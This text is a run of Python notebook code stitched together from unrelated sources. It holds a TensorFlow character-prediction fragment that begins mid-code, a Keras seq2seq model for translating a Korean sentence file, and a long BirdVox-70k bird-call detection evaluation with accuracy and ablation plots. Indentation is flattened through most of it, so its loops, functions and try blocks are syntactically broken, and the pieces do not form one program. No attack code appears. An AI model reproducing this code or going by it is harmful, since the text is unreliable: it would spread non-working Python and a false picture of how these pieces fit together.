plt.plot(cost_epoch, linewidth=1)
plt.show()
prediction = tf.cast(tf.argmax(model, 1), tf.int32)
prediction_check = tf.equal(prediction, Y)
accuracy = tf.reduce_mean(tf.cast(prediction_check, tf.float32))
input_batch, target_batch = make_batch(seq_data)
predict, accuracy_val = sess.run([prediction, accuracy],
feed_dict={X: input_batch, Y: target_batch})
predict_word = []
for idx, val in enumerate(seq_data):
last_char = char_arr[predict[idx]]
predict_word.append(val[:3] + last_char)
print("\n==== prediction ====")
print("input_value: \t\t{}".format([w[:3] for w in seq_data]))
print("prediction_value: \t{}".format(predict_word))
print("accuracy: {:.3f}".format(accuracy_val))
```
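The `make_batch` encoding above (first three characters one-hot, last character as an integer label) can be checked in isolation, without TensorFlow; this is a minimal sketch that mirrors the function above:

```
import numpy as np

char_arr = [chr(c) for c in range(ord("a"), ord("z") + 1)]
num_dic = {n: i for i, n in enumerate(char_arr)}
dic_len = len(num_dic)

def make_batch(seq_data):
    input_batch, target_batch = [], []
    for seq in seq_data:
        idxs = [num_dic[n] for n in seq[:-1]]      # first three characters
        input_batch.append(np.eye(dic_len)[idxs])  # one-hot rows, shape (3, 26)
        target_batch.append(num_dic[seq[-1]])      # index of the last character
    return input_batch, target_batch

inputs, targets = make_batch(["word"])
assert inputs[0].shape == (3, 26)
assert inputs[0][0, num_dic["w"]] == 1.0
assert targets[0] == num_dic["d"]
```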
# toy code used in 4.ipynb to illustrate the attention concept
# +++++++++++++++++++++++++++++++++++++++++++++++++++
### [Assignment] Training takes a long time; add a feature to load the saved model.
### [Assignment] Translate the Korean chatbot data to English with Google Translate and explore the results.
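A minimal sketch for the first assignment, assuming the model is saved to `./data_nmt/data/s2s.h5` as in the training code below (`maybe_load` is a hypothetical helper, not part of the original notebook):

```
import os

def maybe_load(path):
    """Return the saved Keras model if `path` exists, else None (hypothetical helper)."""
    if not os.path.exists(path):
        return None
    from keras.models import load_model  # lazy import so the check works without Keras
    return load_model(path)

model = maybe_load("./data_nmt/data/s2s.h5")
if model is None:
    print("no saved model found; run the training code first")
```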
```
from __future__ import print_function
from keras.models import Model
from keras.layers import Input, LSTM, Dense
import numpy as np
batch_size = 64 # Batch size for training.
epochs = 3 # 100 # Number of epochs to train for.
latent_dim = 256 # Latent dimensionality of the encoding space.
num_samples = 10000 # Number of samples to train on.
# Path to the data txt file on disk.
data_path = 'data_nmt/data/kor.txt'
# Vectorize the data.
input_texts = []
target_texts = []
input_characters = set()
target_characters = set()
with open(data_path, 'r', encoding='utf-8') as f:
lines = f.read().split('\n')
for line in lines[: min(num_samples, len(lines) - 1)]:
    input_text, target_text, _ = line.split('\t')  # the third tab-separated field (attribution) is unused
# We use "tab" as the "start sequence" character
# for the targets, and "\n" as "end sequence" character.
target_text = '\t' + target_text + '\n'
input_texts.append(input_text)
target_texts.append(target_text)
for char in input_text:
if char not in input_characters:
input_characters.add(char)
for char in target_text:
if char not in target_characters:
target_characters.add(char)
input_characters = sorted(list(input_characters))
target_characters = sorted(list(target_characters))
num_encoder_tokens = len(input_characters)
num_decoder_tokens = len(target_characters)
max_encoder_seq_length = max([len(txt) for txt in input_texts])
max_decoder_seq_length = max([len(txt) for txt in target_texts])
print('Number of samples:', len(input_texts))
print('Number of unique input tokens:', num_encoder_tokens)
print('Number of unique output tokens:', num_decoder_tokens)
print('Max sequence length for inputs:', max_encoder_seq_length)
print('Max sequence length for outputs:', max_decoder_seq_length)
input_token_index = dict(
[(char, i) for i, char in enumerate(input_characters)])
target_token_index = dict(
[(char, i) for i, char in enumerate(target_characters)])
encoder_input_data = np.zeros(
(len(input_texts), max_encoder_seq_length, num_encoder_tokens),
dtype='float32')
decoder_input_data = np.zeros(
(len(input_texts), max_decoder_seq_length, num_decoder_tokens),
dtype='float32')
decoder_target_data = np.zeros(
(len(input_texts), max_decoder_seq_length, num_decoder_tokens),
dtype='float32')
for i, (input_text, target_text) in enumerate(zip(input_texts, target_texts)):
for t, char in enumerate(input_text):
encoder_input_data[i, t, input_token_index[char]] = 1.
encoder_input_data[i, t + 1:, input_token_index[' ']] = 1.
for t, char in enumerate(target_text):
# decoder_target_data is ahead of decoder_input_data by one timestep
decoder_input_data[i, t, target_token_index[char]] = 1.
if t > 0:
# decoder_target_data will be ahead by one timestep
# and will not include the start character.
decoder_target_data[i, t - 1, target_token_index[char]] = 1.
decoder_input_data[i, t + 1:, target_token_index[' ']] = 1.
decoder_target_data[i, t:, target_token_index[' ']] = 1.
# Define an input sequence and process it.
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder = LSTM(latent_dim, return_state=True)
encoder_outputs, state_h, state_c = encoder(encoder_inputs)
# We discard `encoder_outputs` and only keep the states.
encoder_states = [state_h, state_c]
# Set up the decoder, using `encoder_states` as initial state.
decoder_inputs = Input(shape=(None, num_decoder_tokens))
# We set up our decoder to return full output sequences,
# and to return internal states as well. We don't use the
# return states in the training model, but we will use them in inference.
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_inputs,
initial_state=encoder_states)
decoder_dense = Dense(num_decoder_tokens, activation='softmax')
decoder_outputs = decoder_dense(decoder_outputs)
# Define the model that will turn
# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`
model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
# Run training
model.compile(optimizer='rmsprop', loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit([encoder_input_data, decoder_input_data], decoder_target_data,
batch_size=batch_size,
epochs=epochs,
validation_split=0.2)
# Save model
model.save('./data_nmt/data/s2s.h5')
# Next: inference mode (sampling).
# Here's the drill:
# 1) encode input and retrieve initial decoder state
# 2) run one step of decoder with this initial state
# and a "start of sequence" token as target.
# Output will be the next target token
# 3) Repeat with the current target token and current states
# Define sampling models
encoder_model = Model(encoder_inputs, encoder_states)
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
decoder_outputs, state_h, state_c = decoder_lstm(
decoder_inputs, initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = Model(
[decoder_inputs] + decoder_states_inputs,
[decoder_outputs] + decoder_states)
# Reverse-lookup token index to decode sequences back to
# something readable.
reverse_input_char_index = dict(
(i, char) for char, i in input_token_index.items())
reverse_target_char_index = dict(
(i, char) for char, i in target_token_index.items())
def decode_sequence(input_seq):
# Encode the input as state vectors.
states_value = encoder_model.predict(input_seq)
# Generate empty target sequence of length 1.
target_seq = np.zeros((1, 1, num_decoder_tokens))
# Populate the first character of target sequence with the start character.
target_seq[0, 0, target_token_index['\t']] = 1.
# Sampling loop for a batch of sequences
# (to simplify, here we assume a batch of size 1).
stop_condition = False
decoded_sentence = ''
while not stop_condition:
output_tokens, h, c = decoder_model.predict(
[target_seq] + states_value)
# Sample a token
sampled_token_index = np.argmax(output_tokens[0, -1, :])
sampled_char = reverse_target_char_index[sampled_token_index]
decoded_sentence += sampled_char
# Exit condition: either hit max length
# or find stop character.
if (sampled_char == '\n' or
len(decoded_sentence) > max_decoder_seq_length):
stop_condition = True
# Update the target sequence (of length 1).
target_seq = np.zeros((1, 1, num_decoder_tokens))
target_seq[0, 0, sampled_token_index] = 1.
# Update states
states_value = [h, c]
return decoded_sentence
for seq_index in range(100):
# Take one sequence (part of the training set)
# for trying out decoding.
input_seq = encoder_input_data[seq_index: seq_index + 1]
decoded_sentence = decode_sequence(input_seq)
print('-')
print('Input sentence:', input_texts[seq_index])
print('Decoded sentence:', decoded_sentence)
```
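The one-timestep offset between `decoder_input_data` and `decoder_target_data` built above can be verified on a toy example (the four-token vocabulary here is an illustration, not the real character set):

```
import numpy as np

tokens = {"\t": 0, "\n": 1, "h": 2, "i": 3}        # toy vocabulary for illustration
target_text = "\t" + "hi" + "\n"                   # start token + word + end token
T, V = len(target_text), len(tokens)
dec_input = np.zeros((T, V), dtype="float32")
dec_target = np.zeros((T, V), dtype="float32")
for t, char in enumerate(target_text):
    dec_input[t, tokens[char]] = 1.0
    if t > 0:
        dec_target[t - 1, tokens[char]] = 1.0      # target leads input by one step
# at every step t, the target is exactly the input at step t + 1
assert (dec_target[:-1] == dec_input[1:]).all()
# the target never contains the start character "\t"
assert dec_target[:, tokens["\t"]].sum() == 0.0
```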
```
import csv
import numpy as np
import os
import pandas as pd
import scipy.interpolate
import sklearn.metrics
import sys
sys.path.append("../src")
import localmodule
if sys.version_info[0] < 3:
from StringIO import StringIO
else:
from io import StringIO
from matplotlib import pyplot as plt
%matplotlib inline
# Define constants.
dataset_name = localmodule.get_dataset_name()
models_dir = localmodule.get_models_dir()
units = localmodule.get_units()
n_units = len(units)
n_trials = 10
import tqdm
model_names = [
"icassp-convnet", "icassp-convnet_aug-all-but-noise", "icassp-convnet_aug-all",
"pcen-convnet", "pcen-convnet_aug-all-but-noise", "pcen-convnet_aug-all",
"icassp-ntt-convnet", "icassp-ntt-convnet_aug-all-but-noise", "icassp-ntt-convnet_aug-all",
"pcen-ntt-convnet", "pcen-ntt-convnet_aug-all-but-noise", "pcen-ntt-convnet_aug-all",
"icassp-add-convnet", "icassp-add-convnet_aug-all-but-noise", "icassp-add-convnet_aug-all",
"pcen-add-convnet", "pcen-add-convnet_aug-all-but-noise", "pcen-add-convnet_aug-all",
]
n_models = len(model_names)
fold_accs = []
for fold_id in range(6):
model_accs = {}
for model_name in tqdm.tqdm(model_names):
val_accs = []
for trial_id in range(10):
model_dir = os.path.join(models_dir, model_name)
test_unit_str = units[fold_id]
test_unit_dir = os.path.join(model_dir, test_unit_str)
trial_str = "trial-" + str(trial_id)
trial_dir = os.path.join(test_unit_dir, trial_str)
val_unit_strs = localmodule.fold_units()[fold_id][2]
val_tn = 0
val_tp = 0
val_fn = 0
val_fp = 0
for val_unit_str in val_unit_strs:
predictions_name = "_".join([
dataset_name,
model_name,
"test-" + test_unit_str,
trial_str,
"predict-" + val_unit_str,
"clip-predictions.csv"
])
prediction_path = os.path.join(
trial_dir, predictions_name)
# Load prediction.
try:
with open(prediction_path, 'r') as f:
reader = csv.reader(f)
rows = list(reader)
rows = [",".join(row) for row in rows]
rows = rows[1:]
rows = "\n".join(rows)
# Parse rows with correct header.
df = pd.read_csv(StringIO(rows),
names=[
"Dataset",
"Test unit",
"Prediction unit",
"Timestamp",
"Center Freq (Hz)",
"Augmentation",
"Key",
"Ground truth",
"Predicted probability"])
y_pred = np.array(df["Predicted probability"])
y_pred = (y_pred > 0.5).astype('int')
# Load ground truth.
y_true = np.array(df["Ground truth"])
# Compute confusion matrix.
tn, fp, fn, tp = sklearn.metrics.confusion_matrix(
y_true, y_pred).ravel()
val_tn = val_tn + tn
val_fp = val_fp + fp
val_fn = val_fn + fn
val_tp = val_tp + tp
                except Exception:
                    # missing or corrupted CSV: mark this trial as unusable
                    val_tn = -np.inf
                    val_tp = -np.inf
                    val_fn = -np.inf
                    val_fp = -np.inf
if val_tn < 0:
val_acc = 0.0
else:
val_acc =\
100 * (val_tn+val_tp) /\
(val_tn+val_tp+val_fn+val_fp)
val_accs.append(val_acc)
# Remove the models that did not train (accuracy close to 50%, i.e. chance)
val_accs = [v for v in val_accs if v > 65.0]
model_accs[model_name] = val_accs
fold_accs.append(model_accs)
fold_accs
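# Illustrative check of the clip-level accuracy formula used above
# (hypothetical confusion-matrix counts, not results from this dataset):
assert 100 * (90 + 85) / (90 + 85 + 15 + 10) == 87.5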
fold_id = 0
#model_accs = np.stack(list(fold_accs[fold_id].values()))[:,:]
#plt.boxplot(model_accs.T);
model_names = [
"icassp-convnet", "icassp-convnet_aug-all-but-noise", "icassp-convnet_aug-all",
"pcen-convnet", "pcen-convnet_aug-all-but-noise", "pcen-convnet_aug-all",
"icassp-ntt-convnet", "icassp-ntt-convnet_aug-all-but-noise", "icassp-ntt-convnet_aug-all",
"pcen-ntt-convnet", "pcen-ntt-convnet_aug-all-but-noise", "pcen-ntt-convnet_aug-all",
"icassp-add-convnet", "icassp-add-convnet_aug-all-but-noise", "icassp-add-convnet_aug-all",
"pcen-add-convnet", "pcen-add-convnet_aug-all-but-noise", "pcen-add-convnet_aug-all",
]
errs = 100 - np.stack([np.median(x) for x in list(fold_accs[fold_id].values())])
xmax = np.ceil(np.max(errs)) + 2.5
fig = plt.figure(figsize=(xmax/2, 4), frameon=False)
plt.plot(errs[0], [0], 'o', color='blue');
plt.plot(errs[1], [1], 'o', color='blue');
plt.plot(errs[2], [2], 'o', color='blue');
plt.plot(errs[3], [0], 'o', color='orange');
plt.plot(errs[4], [1], 'o', color='orange');
plt.plot(errs[5], [2], 'o', color='orange');
plt.text(-0.5, 1, 'no context\nadaptation',
horizontalalignment='center',
verticalalignment='center',
rotation=90, wrap=True)
#plt.text(max(errs[0], errs[3]) + 1, 0, 'none');
#plt.text(max(errs[1], errs[4]) + 1, 1, 'geometrical');
#plt.text(max(errs[2], errs[5]) + 1, 2, 'adaptive');
plt.plot(errs[6], [4], 'o', color='blue');
plt.plot(errs[7], [5], 'o', color='blue');
plt.plot(errs[8], [6], 'o', color='blue');
plt.plot(errs[9], [4], 'o', color='orange');
plt.plot(errs[10], [5], 'o', color='orange');
plt.plot(errs[11], [6], 'o', color='orange');
plt.text(-0.5, 5, 'mixture\nof experts',
horizontalalignment='center',
verticalalignment='center',
rotation=90, wrap=True)
#plt.text(max(errs[6], errs[9]) + 1, 4, 'none');
#plt.text(max(errs[7], errs[10]) + 1, 5, 'geometrical');
#plt.text(max(errs[8], errs[11]) + 1, 6, 'adaptive');
plt.plot(errs[12], [8], 'o', color='blue');
plt.plot(errs[13], [9], 'o', color='blue');
plt.plot(errs[14], [10], 'o', color='blue');
plt.plot(errs[15], [8], 'o', color='orange');
plt.plot(errs[16], [9], 'o', color='orange');
plt.plot(errs[17], [10], 'o', color='orange');
plt.text(-0.5, 9, 'adaptive\nthreshold',
horizontalalignment='center',
verticalalignment='center',
rotation=90, wrap=True)
#plt.text(max(errs[12], errs[15]) + 1, 8, 'none');
#plt.text(max(errs[13], errs[16]) + 1, 9, 'geometrical');
#plt.text(max(errs[14], errs[17]) + 1, 10, 'adaptive');
plt.plot([0, xmax], [3, 3], '--', color=[0.75, 0.75, 0.75], linewidth=1.0, alpha=0.5)
plt.plot([0, xmax], [7, 7], '--', color=[0.75, 0.75, 0.75], linewidth=1.0, alpha=0.5)
plt.xlim([0.0, xmax])
plt.ylim([10.5, -0.5])
ax = fig.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['left'].set_visible(False)
ax.get_yaxis().set_ticks([])
fig.gca().set_xticks(range(0, int(xmax)+1, 1));
fig.gca().xaxis.grid(linestyle='--', alpha=0.5)
plt.xlabel("Average miss rate (%)")
#plt.savefig("spl_bv-70k-benchmark_fold-" + units[fold_id] + ".eps")
model_names = [
# "icassp-convnet", "icassp-convnet_aug-all-but-noise",
# "icassp-ntt-convnet", "icassp-ntt-convnet_aug-all-but-noise",
# "icassp-add-convnet", "icassp-add-convnet_aug-all-but-noise",
# "pcen-convnet", "pcen-convnet_aug-all-but-noise",
# "pcen-ntt-convnet", "pcen-ntt-convnet_aug-all-but-noise",
# "pcen-add-convnet", "pcen-add-convnet_aug-all-but-noise",
]
model_names = [
"icassp-convnet", "icassp-ntt-convnet", "icassp-add-convnet",
"icassp-convnet_aug-all-but-noise", "icassp-ntt-convnet_aug-all-but-noise", "icassp-add-convnet_aug-all-but-noise",
"pcen-convnet", "pcen-ntt-convnet", "pcen-add-convnet",
"pcen-convnet_aug-all-but-noise", "pcen-ntt-convnet_aug-all-but-noise", "pcen-add-convnet_aug-all-but-noise"
]
plt.gca().invert_yaxis()
colors = [
"#CB0003", # RED
"#E67300", # ORANGE
"#990099", # PURPLE
"#0000B2", # BLUE
"#009900", # GREEN
# '#008888', # TURQUOISE
# '#888800', # KAKI
'#555555', # GREY
]
xticks = np.array([1.0, 1.5, 2, 2.5, 3, 4, 5, 6, 8, 10, 12, 16, 20])
#xticks = np.array(range(1, 20))
plt.xticks(np.log2(xticks))
xtick_strs = []
for xtick in xticks:
if np.abs(xtick - int(xtick)) == 0:
xtick_strs.append("{:2d}".format(int(xtick)))
else:
xtick_strs.append("{:1.1f}".format(xtick))
print(xtick_strs)
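# The ticks are placed on a log2 axis, so equal horizontal steps correspond to
# doublings of the miss rate (e.g. 2 -> 4 and 4 -> 8 are both one unit apart):
assert np.log2(4) - np.log2(2) == np.log2(8) - np.log2(4) == 1.0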
plt.gca().set_xticklabels(xtick_strs, family="serif")
plt.xlim([np.log2(xticks[0]), np.log2(22.0)])
errs = np.zeros((len(model_names), 6))
for fold_id in range(6):
errs[:, fold_id] =\
np.log2(100 - np.array([np.median(fold_accs[fold_id][name]) for name in model_names]))
#ys = [1, 2, 4, 5, 7, 8, 11, 12, 14, 15, 17, 18]
ys = [1, 2, 3, 5, 6, 7, 10, 11, 12, 14, 15, 16]
for i in range(len(model_names)):
plt.plot(errs[i, fold_id], ys[i], 'o', color=colors[fold_id]);
ytick_dict = {
"icassp-convnet": " logmelspec ",
"icassp-convnet_aug-all-but-noise": "GDA ➡ logmelspec ",
##
"icassp-ntt-convnet": " logmelspec ➡ MoE",
"icassp-ntt-convnet_aug-all-but-noise": "GDA ➡ logmelspec ➡ MoE",
##
"icassp-add-convnet": " logmelspec ➡ AT ",
"icassp-add-convnet_aug-all-but-noise": "GDA ➡ logmelspec ➡ AT ",
###
###
"pcen-convnet": " PCEN ",
"pcen-convnet_aug-all-but-noise": "GDA ➡ PCEN ",
##
"pcen-ntt-convnet": " PCEN ➡ MoE",
"pcen-ntt-convnet_aug-all-but-noise": "GDA ➡ PCEN ➡ MoE",
##
"pcen-add-convnet": " PCEN ➡ AT ",
"pcen-add-convnet_aug-all-but-noise": "GDA ➡ PCEN ➡ AT ",
}
plt.yticks(ys)
plt.gca().set_yticklabels([ytick_dict[m] for m in model_names], family="monospace")
plt.xlabel("Per-fold validation error rate (%)", family="serif")
plt.gca().spines['left'].set_visible(False)
plt.gca().spines['top'].set_visible(False)
plt.gca().spines['right'].set_visible(False)
plt.gca().grid(linestyle="--")
plt.savefig('fig_per-fold-validation.svg', bbox_inches="tight")
# np.sum(pareto > 0, axis=1)  # leftover scratch line: 'pareto' is never defined in this notebook
n_val_trials = 1
model_names = [
"icassp-convnet", "icassp-convnet_aug-all-but-noise", "icassp-convnet_aug-all",
"icassp-ntt-convnet", "icassp-ntt-convnet_aug-all-but-noise", "icassp-ntt-convnet_aug-all",
"pcen-convnet", "pcen-convnet_aug-all-but-noise", "pcen-convnet_aug-all",
"icassp-add-convnet", "icassp-add-convnet_aug-all-but-noise", "icassp-add-convnet_aug-all",
"pcen-add-convnet", "pcen-add-convnet_aug-all-but-noise", "pcen-add-convnet_aug-all",
"pcen-ntt-convnet_aug-all-but-noise", "pcen-ntt-convnet_aug-all",
"pcen-addntt-convnet_aug-all-but-noise",
]
n_models = len(model_names)
model_val_accs = {}
model_test_accs = {}
# Loop over models.
for model_id, model_name in enumerate(model_names):
model_dir = os.path.join(models_dir, model_name)
model_val_accs[model_name] = np.zeros((6,))
model_test_accs[model_name] = np.zeros((6,))
for test_unit_id in range(6):
# TRIAL SELECTION
test_unit_str = units[test_unit_id]
test_unit_dir = os.path.join(model_dir, test_unit_str)
val_accs = []
for trial_id in range(n_trials):
trial_str = "trial-" + str(trial_id)
trial_dir = os.path.join(test_unit_dir, trial_str)
history_name = "_".join([
dataset_name,
model_name,
test_unit_str,
trial_str,
"history.csv"
])
history_path = os.path.join(
trial_dir, history_name)
try:
history_df = pd.read_csv(history_path)
val_acc = max(history_df["Validation accuracy (%)"])
            except Exception:
                # missing or malformed history file: treat this trial as failed
                val_acc = 0.0
val_accs.append(val_acc)
val_accs = np.array(val_accs)
trial_id = np.argmax(val_accs)
# VALIDATION SET EVALUATION
trial_str = "trial-" + str(trial_id)
trial_dir = os.path.join(test_unit_dir, trial_str)
fns, fps, tns, tps = [], [], [], []
validation_units = localmodule.fold_units()[test_unit_id][2]
for val_unit_str in validation_units:
predictions_name = "_".join([
dataset_name,
model_name,
"test-" + test_unit_str,
trial_str,
"predict-" + val_unit_str,
"clip-predictions.csv"
])
prediction_path = os.path.join(
trial_dir, predictions_name)
# Load prediction.
with open(prediction_path, 'r') as f:
reader = csv.reader(f)
rows = list(reader)
rows = [",".join(row) for row in rows]
rows = rows[1:]
rows = "\n".join(rows)
# Parse rows with correct header.
df = pd.read_csv(StringIO(rows),
names=[
"Dataset",
"Test unit",
"Prediction unit",
"Timestamp",
"Center Freq (Hz)",
"Augmentation",
"Key",
"Ground truth",
"Predicted probability"])
y_pred = np.array(df["Predicted probability"])
y_pred = (y_pred > 0.5).astype('int')
# Load ground truth.
y_true = np.array(df["Ground truth"])
# Compute confusion matrix.
tn, fp, fn, tp = sklearn.metrics.confusion_matrix(
y_true, y_pred).ravel()
tns.append(tn)
fps.append(fp)
fns.append(fn)
tps.append(tp)
tn = sum(tns)
tp = sum(tps)
fn = sum(fns)
fp = sum(fps)
val_acc = 100 * (tn+tp) / (tn+tp+fn+fp)
model_val_accs[model_name][test_unit_id] = val_acc
# TEST SET EVALUATION
trial_dir = os.path.join(
test_unit_dir, trial_str)
predictions_name = "_".join([
dataset_name,
model_name,
"test-" + test_unit_str,
trial_str,
"predict-" + test_unit_str,
"clip-predictions.csv"
])
prediction_path = os.path.join(
trial_dir, predictions_name)
# Load prediction.
with open(prediction_path, 'r') as f:
reader = csv.reader(f)
rows = list(reader)
rows = [",".join(row) for row in rows]
rows = rows[1:]
rows = "\n".join(rows)
# Parse rows with correct header.
df = pd.read_csv(StringIO(rows),
names=[
"Dataset",
"Test unit",
"Prediction unit",
"Timestamp",
"Center Freq (Hz)",
"Augmentation",
"Key",
"Ground truth",
"Predicted probability"])
y_pred = np.array(df["Predicted probability"])
y_pred = (y_pred > 0.5).astype('int')
# Load ground truth.
y_true = np.array(df["Ground truth"])
# Compute confusion matrix.
tn, fp, fn, tp = sklearn.metrics.confusion_matrix(
y_true, y_pred).ravel()
test_acc = 100 * (tn+tp) / (tn+tp+fn+fp)
model_test_accs[model_name][test_unit_id] = test_acc
model_names
model_diagrams = {
"icassp-convnet": " melspec -> log ",
"icassp-convnet_aug-all-but-noise": " geom -> melspec -> log ",
"icassp-convnet_aug-all": "(noise + geom) -> melspec -> log ",
"icassp-ntt-convnet": " melspec -> log -> NTT ",
"icassp-ntt-convnet_aug-all-but-noise": " geom -> melspec -> log -> NTT ",
"icassp-ntt-convnet_aug-all": "(noise + geom) -> melspec -> log -> NTT ",
"pcen-convnet": " melspec -> PCEN ",
    "pcen-convnet_aug-all-but-noise": "          geom -> melspec -> PCEN ",
"pcen-convnet_aug-all": "(noise + geom) -> melspec -> PCEN ",
"icassp-add-convnet": " melspec -> log -> CONCAT",
"icassp-add-convnet_aug-all-but-noise": " geom -> melspec -> log -> CONCAT",
    "icassp-add-convnet_aug-all": "(noise + geom) -> melspec -> log -> CONCAT",
"pcen-add-convnet": " melspec -> PCEN -> CONCAT",
"pcen-add-convnet_aug-all-but-noise": " geom -> melspec -> PCEN -> CONCAT",
"pcen-add-convnet_aug-all": "(noise + geom) -> melspec -> PCEN -> CONCAT",
"pcen-ntt-convnet_aug-all-but-noise": " geom -> melspec -> PCEN -> NTT ",
"pcen-ntt-convnet_aug-all": "(noise + geom) -> melspec -> PCEN -> NTT ",
"pcen-addntt-convnet_aug-all": "(noise + geom) -> melspec -> PCEN -> AFFINE"}
plt.figure(figsize=(9, 6))
plt.rcdefaults()
fig, ax = plt.subplots()
plt.boxplot(np.stack(model_val_accs.values()).T, 0, 'rs', 0)
#plt.ylim((-5.0, 1.0))
plt.setp(ax.get_yticklabels(), family="serif")
ax.set_yticklabels(model_names)
plt.gca().invert_yaxis()
ax.set_xlabel('Accuracy (%)')
ax.set_title('BirdVox-70k validation set')
plt.show()
plt.figure(figsize=(9, 6))
plt.rcdefaults()
fig, ax = plt.subplots()
plt.boxplot(np.stack(model_test_accs.values()).T, 0, 'rs', 0)
#plt.ylim((-5.0, 1.0))
plt.setp(ax.get_yticklabels(), family="serif")
ax.set_yticklabels(model_names)
plt.gca().invert_yaxis()
ax.set_xlabel('Accuracy (%)')
ax.set_title('BirdVox-70k test set')
plt.show()
model_test_accs
ablation_reference_name = "pcen-add-convnet_aug-all-but-noise"
ablation_names = [x for x in list(model_val_accs.keys()) if x not in
["icassp-add-convnet_aug-all",
ablation_reference_name,
"icassp-ntt-convnet",
"pcen-addntt-convnet_aug-all-but-noise"]]
ablation_names = list(reversed(ablation_names))
ytick_dict = {
"icassp-convnet": " logmelspec ",
"icassp-convnet_aug-all-but-noise": "GDA -> logmelspec ",
"icassp-convnet_aug-all": "ADA -> logmelspec ",
##
"icassp-ntt-convnet": " logmelspec -> MoE",
"icassp-ntt-convnet_aug-all-but-noise": "GDA -> logmelspec -> MoE",
"icassp-ntt-convnet_aug-all": "ADA -> logmelspec -> MoE",
##
"icassp-add-convnet": " logmelspec -> AT ",
"icassp-add-convnet_aug-all-but-noise": "GDA -> logmelspec -> AT ",
"icassp-add-convnet_aug-all": "ADA -> logmelspec -> AT ",
###
###
"pcen-convnet": " PCEN ",
"pcen-convnet_aug-all-but-noise": "GDA -> PCEN ",
"pcen-convnet_aug-all": "ADA -> PCEN ",
##
"pcen-ntt-convnet": " PCEN -> MoE",
"pcen-ntt-convnet_aug-all-but-noise": "GDA -> PCEN -> MoE",
    "pcen-ntt-convnet_aug-all": "ADA -> PCEN -> MoE",
##
"pcen-add-convnet": " PCEN -> AT ",
"pcen-add-convnet_aug-all-but-noise": "GDA -> PCEN -> AT ",
"pcen-add-convnet_aug-all": "ADA -> PCEN -> AT ",
###
"pcen-addntt-convnet_aug-all-but-noise":"GDA -> PCEN -> AT + MoE ",
}
reference_val_accs = model_val_accs[ablation_reference_name]
ablation_val_accs = [
100 * (reference_val_accs - model_val_accs[name]) / (100 - reference_val_accs)
for name in ablation_names]
ablation_names = list(reversed([ablation_names[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))
ablation_val_accs = list(reversed([ablation_val_accs[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))
ablation_val_accs = np.array(ablation_val_accs)
plt.rcdefaults()
fig, ax = plt.subplots(figsize=(8, 6))
plt.grid(linestyle="--")
plt.axvline(0.0, linestyle="--", color="#009900")
plt.plot([0.0], [1+len(ablation_val_accs)], 'd',
color="#009900", markersize=10.0)
colors = [
"#CB0003", # RED
"#E67300", # ORANGE
"#990099", # PURPLE
"#0000B2", # BLUE
"#009900", # GREEN
# '#008888', # TURQUOISE
# '#888800', # KAKI
'#555555', # GREY
]
plt.boxplot(ablation_val_accs.T, 0, 'rs', 0,
whis=100000, patch_artist=True, boxprops={"facecolor": "w"})
for i, color in enumerate(colors):
plt.plot(np.array(ablation_val_accs[:,i]),
range(1, 1+len(ablation_val_accs[:,i])), 'o', color=color)
fig.canvas.draw()
plt.setp(ax.get_yticklabels(), family="serif")
#ax.set_yticklabels([
# "adaptive threshold\nreplaced by\n mixture of experts",
# "no data augmentation",
# "addition of noise\nto frontend but not to\nauxiliary features",
# "no context adaptation",
# "PCEN\nreplaced by\nlog-mel frontend",
# "state of the art [X]"])
ax.set_yticks(range(1, 2+len(ablation_val_accs)))
ax.set_yticklabels([ytick_dict[x] for x in
(ablation_names + [ablation_reference_name])], family="monospace")
plt.gca().invert_xaxis()
plt.gca().invert_yaxis()
ax.set_xlabel('Relative difference in validation miss rate (%)', family="serif")
plt.ylim([0.5, 1.5+len(ablation_names)])
plt.show()
reference_test_accs = model_test_accs[ablation_reference_name]
print(reference_test_accs)
baseline_test_accs = model_test_accs["icassp-convnet_aug-all"]
print(baseline_test_accs)
plt.savefig('fig_exhaustive-per-fold-validation.eps', bbox_inches="tight")
plt.savefig('fig_exhaustive-per-fold-validation.png', bbox_inches="tight", dpi=1000)
%matplotlib inline
ablation_reference_name = "pcen-add-convnet_aug-all-but-noise"
#ablation_names = [x for x in list(model_val_accs.keys()) if x not in
# ["icassp-add-convnet_aug-all",
# ablation_reference_name,
# "icassp-ntt-convnet",
# "pcen-addntt-convnet_aug-all-but-noise"]]
ablation_names = [
"pcen-ntt-convnet_aug-all-but-noise",
"pcen-add-convnet",
"pcen-add-convnet_aug-all",
"pcen-convnet_aug-all-but-noise",
"icassp-convnet_aug-all-but-noise",
"icassp-convnet_aug-all"
]
ablation_names = list(reversed(ablation_names))
ytick_dict = {
"icassp-convnet": " logmelspec ",
"icassp-convnet_aug-all-but-noise": "GDA -> logmelspec ",
"icassp-convnet_aug-all": "ADA -> logmelspec ",
##
"icassp-ntt-convnet": " logmelspec -> MoE",
"icassp-ntt-convnet_aug-all-but-noise": "GDA -> logmelspec -> MoE",
"icassp-ntt-convnet_aug-all": "ADA -> logmelspec -> MoE",
##
"icassp-add-convnet": " logmelspec -> AT ",
"icassp-add-convnet_aug-all-but-noise": "GDA -> logmelspec -> AT ",
"icassp-add-convnet_aug-all": "ADA -> logmelspec -> AT ",
###
###
"pcen-convnet": " PCEN ",
"pcen-convnet_aug-all-but-noise": "GDA -> PCEN ",
"pcen-convnet_aug-all": "ADA -> PCEN ",
##
"pcen-ntt-convnet": " PCEN -> MoE",
"pcen-ntt-convnet_aug-all-but-noise": "GDA -> PCEN -> MoE",
    "pcen-ntt-convnet_aug-all": "ADA -> PCEN -> MoE",
##
"pcen-add-convnet": " PCEN -> AT ",
"pcen-add-convnet_aug-all-but-noise": "GDA -> PCEN -> AT ",
"pcen-add-convnet_aug-all": "ADA -> PCEN -> AT ",
###
